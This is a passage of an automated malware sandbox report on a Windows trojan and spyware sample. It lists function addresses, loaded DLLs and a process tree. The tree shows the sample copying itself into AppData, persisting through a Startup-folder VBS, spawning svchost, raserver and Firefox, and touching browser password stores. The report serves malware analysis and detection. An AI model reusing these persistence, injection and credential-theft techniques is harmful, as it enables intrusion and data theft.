                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0001FE402_2_0001FE40
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0009804A2_2_0009804A
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0001E0602_2_0001E060
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000241402_2_00024140
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000324052_2_00032405
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000465222_2_00046522
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000906652_2_00090665
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0004267E2_2_0004267E
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0003283A2_2_0003283A
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000268432_2_00026843
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000489DF2_2_000489DF
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00028A0E2_2_00028A0E
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00046A942_2_00046A94
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00090AE22_2_00090AE2
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0006EB072_2_0006EB07
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00078B132_2_00078B13
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0003CD612_2_0003CD61
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000470062_2_00047006
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0002710E2_2_0002710E
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000231902_2_00023190
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000112872_2_00011287
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000333C72_2_000333C7
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0003F4192_2_0003F419
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000256802_2_00025680
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000316C42_2_000316C4
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000258C02_2_000258C0
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000378D32_2_000378D3
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00031BB82_2_00031BB8
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00049D052_2_00049D05
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00031FD02_2_00031FD0
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0003BFE62_2_0003BFE6
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_011D66482_2_011D6648
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418AA33_2_00418AA3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004010003_2_00401000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004030B03_2_004030B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004011473_2_00401147
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004011503_2_00401150
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042F1033_2_0042F103
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004102EA3_2_004102EA
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004102F33_2_004102F3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402C103_2_00402C10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416C9E3_2_00416C9E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004024A03_2_004024A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416CA33_2_00416CA3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004105133_2_00410513
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E5233_2_0040E523
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E6683_2_0040E668
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E6733_2_0040E673
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004027703_2_00402770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FA3523_2_030FA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F03_2_0304E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031003E63_2_031003E6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E02743_2_030E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C02C03_2_030C02C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030301003_2_03030100
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA1183_2_030DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C81583_2_030C8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F41A23_2_030F41A2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031001AA3_2_031001AA
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F81CC3_2_030F81CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D20003_2_030D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030647503_2_03064750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030407703_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303C7C03_2_0303C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305C6E03_2_0305C6E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030405353_2_03040535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031005913_2_03100591
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E44203_2_030E4420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F24463_2_030F2446
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EE4F63_2_030EE4F6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FAB403_2_030FAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F6BD73_2_030F6BD7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA803_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030569623_2_03056962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A03_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310A9A63_2_0310A9A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304A8403_2_0304A840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030428403_2_03042840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030268B83_2_030268B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E8F03_2_0306E8F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03082F283_2_03082F28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03060F303_2_03060F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E2F303_2_030E2F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B4F403_2_030B4F40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BEFA03_2_030BEFA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032FC83_2_03032FC8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304CFE03_2_0304CFE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FEE263_2_030FEE26
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040E593_2_03040E59
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052E903_2_03052E90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FCE933_2_030FCE93
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FEEDB3_2_030FEEDB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304AD003_2_0304AD00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DCD1F3_2_030DCD1F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03058DBF3_2_03058DBF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303ADE03_2_0303ADE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040C003_2_03040C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0CB53_2_030E0CB5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030CF23_2_03030CF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F132D3_2_030F132D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302D34C3_2_0302D34C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0308739A3_2_0308739A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030452A03_2_030452A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305B2C03_2_0305B2C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E12ED3_2_030E12ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307516C3_2_0307516C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302F1723_2_0302F172
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310B16B3_2_0310B16B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304B1B03_2_0304B1B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EF0CC3_2_030EF0CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030470C03_2_030470C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F70E93_2_030F70E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FF0E03_2_030FF0E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FF7B03_2_030FF7B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030856303_2_03085630
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F16CC3_2_030F16CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F75713_2_030F7571
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DD5B03_2_030DD5B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031095C33_2_031095C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FF43F3_2_030FF43F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030314603_2_03031460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFB763_2_030FFB76
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305FB803_2_0305FB80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B5BF03_2_030B5BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307DBF93_2_0307DBF9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFA493_2_030FFA49
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F7A463_2_030F7A46
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B3A6C3_2_030B3A6C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DDAAC3_2_030DDAAC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03085AA03_2_03085AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E1AA33_2_030E1AA3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EDAC63_2_030EDAC6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D59103_2_030D5910
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030499503_2_03049950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305B9503_2_0305B950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AD8003_2_030AD800
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030438E03_2_030438E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFF093_2_030FFF09
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03041F923_2_03041F92
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFFB13_2_030FFFB1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03003FD23_2_03003FD2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03003FD53_2_03003FD5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03049EB03_2_03049EB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03043D403_2_03043D40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F1D5A3_2_030F1D5A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F7D733_2_030F7D73
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305FDC03_2_0305FDC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B9C323_2_030B9C32
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFCF23_2_030FFCF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: String function: 00137F41 appears 35 times
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: String function: 00158B40 appears 42 times
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: String function: 00150D27 appears 70 times
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: String function: 00017F41 appears 35 times
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: String function: 00038B40 appears 42 times
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: String function: 00030D27 appears 70 times
                    Source: CjbMEPJZ3J.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@14/11@17/11
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019A2D5 GetLastError,FormatMessageW,0_2_0019A2D5
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00188713 AdjustTokenPrivileges,CloseHandle,0_2_00188713
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00188CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00188CC3
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00068713 AdjustTokenPrivileges,CloseHandle,2_2_00068713
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00068CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00068CC3
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0019B59E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001AF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_001AF121
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0019C602
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00134FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00134FE9
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeFile created: C:\Users\user\AppData\Local\MelbaJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeFile created: C:\Users\user\AppData\Local\Temp\aut842E.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs"
                    Source: CjbMEPJZ3J.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3543702437.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1496563517.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1496429699.0000000002D5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: CjbMEPJZ3J.exeVirustotal: Detection: 52%
                    Source: CjbMEPJZ3J.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeFile read: C:\Users\user\Desktop\CjbMEPJZ3J.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\CjbMEPJZ3J.exe "C:\Users\user\Desktop\CjbMEPJZ3J.exe"
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeProcess created: C:\Users\user\AppData\Local\Melba\unnervously.exe "C:\Users\user\Desktop\CjbMEPJZ3J.exe"
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CjbMEPJZ3J.exe"
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Melba\unnervously.exe "C:\Users\user\AppData\Local\Melba\unnervously.exe"
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Melba\unnervously.exe"
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeProcess created: C:\Users\user\AppData\Local\Melba\unnervously.exe "C:\Users\user\Desktop\CjbMEPJZ3J.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CjbMEPJZ3J.exe"Jump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Melba\unnervously.exe "C:\Users\user\AppData\Local\Melba\unnervously.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Melba\unnervously.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
